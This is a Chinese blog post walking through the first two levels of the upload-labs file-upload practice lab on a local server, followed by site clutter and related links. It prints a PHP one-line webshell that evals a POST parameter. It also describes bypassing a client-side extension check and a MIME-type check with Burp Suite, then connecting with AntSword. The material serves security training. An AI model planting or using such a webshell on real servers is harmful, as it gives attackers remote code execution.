upload-labs-第一关和第二关

最新推荐文章于 2024-07-17 20:53:13 发布
最新推荐文章于 2024-07-17 20:53:13 发布
阅读量464 收藏 5
点赞数 7
分类专栏: 渗透学习之路 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54055099/article/details/139446451
版权

目录

第一关

思路:

1、上传一个php文件

2、查看源码

3、查看文件上传地址

4、BP抓包,修改文件后缀名

5、使用蚁剑连接

第二关

1、这一关也可以跟第一关一样的方法进行绕过

2、上传一个一句话木马文件

第一关

原理:

思路:
1、上传一个php文件

<?php
phpinfo();
@eval($_POST['cmd']); #一句话木马
?>

结果上传失败,并要求我们上传的文件是图片格式的

2、查看源码

发现在前端的代码作了限制,使用checkFile()来检查文件格式,我们可以使用BP抓包,修改文件的后缀名,进行上传

3、查看文件上传地址

先正常上传一个图片

右键查看图像信息,发现上传文件的保存路径

4、BP抓包,修改文件后缀名

将一句话木马文件后缀改成jpg,然后放包上传

上传成功

访问上传的地址

http://127.0.0.1:90/upload-labs-master/upload/flag.php

代码正常执行

5、使用蚁剑连接

连接成功,成功进入主机

第二关

原理:

思路:

1、这一关也可以跟第一关一样的方法进行绕过

下面演示另外一种方法,修改MIME类型

2、上传一个一句话木马文件

上传成功

3、访问上传地址

http://127.0.0.1:90/upload-labs-master/upload/flag.php

php代码正常执行,说明一句话木马也可以执行,用蚁剑连接可以参考上面

这篇文章就先写到这里了,哪里不足欢迎批评指正!

賺钱娶甜甜
关注
  • 7
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
upload-labs第一、二
PISES3_5的博客
08-24 199
upload-labs第一、二
安装upload-labs
10-22
安装upload-labs是网安入门教程系列的一部分,旨在帮助初学者学习文件上传漏洞的基础知识和实践经验。在这篇文章中,我们将一步步指导您如何安装upload-labs靶场,以便更好地学习文件上传漏洞。 安装upload-labs的...
upload-labs第三教程
Estera的博客
06-05 486
upload-labs第三教程
upload-labs之第一关
田田云逸的博客
10-27 4947
一、靶场简介 upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20,每一都包含着不同上传方式。 靶场安装 由于upload-labs 是一个由php 语言编写的靶场,因此需要在php环境下进行使用。我这里推荐用phpstudy集成环境。 靶场项目地址:GitHub - c0ny1/upload-labs: 一个想帮你总结所有类型的上传漏洞的靶场 将源码下载下来之后,在www目录.
upload-labs第五教程
Estera的博客
06-07 1187
php.ini是php的全局配置文件,对整个web服务起作用,.user.ini和.htaccess都是目录的配置文件,.user.ini是用户自定义的php.ini,通常构造后门和隐藏后门。自 PHP 5.3.0 起,PHP 支持基于每个目录的 .htaccess 风格的 INI 文件。此类文件仅被 CGI/FastCGISAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果使用 Apache,则用 .htaccess 文件有同样效果。
WEB渗透学习-upload-labs靶场
04-20
**WEB渗透学习-upload-labs靶场详解** 在网络安全领域,特别是Web渗透测试中,了解和掌握文件上传漏洞是至重要的技能。"upload-labs"靶场是一个专为学习和实践文件上传漏洞设计的平台,它提供了21个卡,从基础...
upload-labs19-20以及总结1
08-08
2. **抓包分析**:使用抓包工具(如Wireshark或Burp Suite)可以观察到`filename`和`save_name`字段,了解数据在网络传输过程中的具体形态,有助于我们理解如何构造请求以绕过安全机制。 3. **文件类型检查**:源码...
upload-labs-master.zip
06-22
【标题】"upload-labs-master.zip" 是一个用于学习和实践文件上传漏洞的靶场项目。这个压缩包包含了 "upload-labs-master" 目录的多次副本,这可能表示靶场设计的不同阶段或者不同的练习环境。 【描述】描述中的 ...
135-PHP、Apache环境中部署upload-labs
10-22
二、upload-labs 的下载和解压 在安装了 PHP 和 Apache 环境后,需要下载 upload-labs 的源代码。可以从 GitHub 上下载 upload-labs 的源代码,并将其解压到指定的文件夹中。 Upload-labs 的源代码可以从 ...
web安全之跨站脚本攻击xss
奔跑的小猪仔
07-17 465
xss 跨站脚本攻击。它指的是恶意攻击者往web页面里插入恶意js代码,当用户浏览该页之时,嵌入其中web里面的js代码会被执行,从而达到恶意的特殊目的。
【网络安全】基于PHP study的DVWA靶场搭建教程
等风来
07-14 424
接着访问:http://127.0.0.1/dvwa-master,拉到页面最下面点击Create/Reset Databse 跳转至该页面后,输入admin、password即可登录:
网络安全-网络安全及其防护措施8
LS_Ai的博客
07-17 905
数据中心网络架构是指数据中心内部网络的设计和结构,其目的是提供高性能、高可用性和高扩展性的网络连接。合理的数据中心网络架构能够支持大规模数据处理和传输,满足数据中心的业务需求,提高整体运营效率。负载均衡是一种分配网络流量和计算任务的方法,旨在优化资源利用率、提高系统性能和增强服务可用性。通过将请求分配到多个服务器上,负载均衡避免了单点故障和性能瓶颈,确保系统稳定和高效运行。网络安全策略是指为保护网络和信息系统的安全而制定的一系列规则和措施。
网络安全法律框架更新:最新合规要求与企业应对策略
2301_79955948的博客
07-14 894
首先,企业应提升网络安全意识,完善责任制度,并注新法律法规的协调衔接。2022年,《网络安全法》迎来了首次修改,这一修订主要是为了与《数据安全法》和《个人信息保护法》等新实施的法律进行衔接协调,完善法律责任制度,进一步保障网络安全。新规定对原有的触发条件进行了优化,例如,键信息基础设施运营者向境外提供个人信息或重要数据,以及特定数量的个人信息或敏感个人信息的跨境传输,都需要进行安全评估。通过上述措施,企业不仅能够提升自身的网络安全防护能力,还能促进国内网络安全产业的高质量发展,为国家网络安全贡献力量。
2024年对网络安全专业的观点解析
最新发布
goodxianping的专栏
07-17 214
网络安全专业的毕业生能够适应多个行业和岗位,包括但不限于政府部门、金融机构、大型互联网公司、电信运营商、科研机构的安全团队。学历较低、经验不足的大量初级从业人员与企业的需求不匹配,一方面找工作难,一方面企业招聘不到合适的安全人员,导致供需矛盾。在网络安全领域,学历并非衡量一个人能力的唯一标准,但普遍较低的学历水平确实反映了行业人才结构的某些问题。张雪峰对网络安全专业的看法是积极和乐观的。随着信息时代的到来,各类企业和组织对网络安全的需求越来越大,使得该专业的毕业生在市场上拥有很大的需求量。
智能车的网络安全隐患及其防护技术
tigerman20201的博客
07-13 418
本文分析了智能车的主要网络安全威胁,包括车辆通信系统、自动驾驶系统、以及车载娱乐系统的潜在风险。在此基础上,提出了多层次的安全防护技术,包括加密通信、入侵检测系统、以及区块链技术等,以提升智能车的网络安全水平。智能车的网络安全是一个复杂且重要的问题,需要多层次、多方面的技术防护。通过加密通信、入侵检测系统、区块链技术等多种手段的结合,可以有效提升智能车的安全性,保障乘客和行人的安全。未来,随着技术的进步和标准的完善,智能车的网络安全将得到进一步的保障。**题目:智能车的网络安全隐患及其防护技术**
7.13实训日志
Kidding_Ma的博客
07-13 471
作为一名大学生,我深感有责任在今后的学习和职业生涯中,为推动网络安全技术的发展和应用做出贡献,保障数字化社会的安全和稳定发展。在技术方面,我们学习了多种编程语言和工具的应用,如Python用于爬虫和脚本、Java用于代码审计和漏洞挖掘、C语言用于二进制漏洞挖掘等。会上,专家学者们分享了于网络安全最新的研究成果和技术应用,以及面临的挑战和未来的发展方向,给我留下了深刻的印象和启发。学习网络安全的过程中,我们深入了解了网络的不同层面和技术,从表层网络到深网再到暗网,以及涉及的产业分类和技术工具。
网络安全工作者如何解决网络拥堵
gmqqcsdn的博客
07-15 802
网络如同现代社会的血管,承载着信息的血液流动。然而,随着数据流量的激增,网络拥堵已成为不容忽视的问题,它像是一场数字世界的交通堵塞,减缓了信息传递的速度,扰乱了网络空间的秩序。作为网络安全的守护者,网络安全工作者必须运用战略智慧和技术手段,解决这一难题,确保每一位用户都能享受流畅的在线体验。
upload-labs第十一
07-25
总之,通过利用%00截断、条件竞争和解析漏洞,我们可以成功绕过文件上传的限制,完成upload-labs第十一的挑战。 #### 引用[.reference_title] - *1* [upload-labs-master 文件上传 第十一和十二]...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值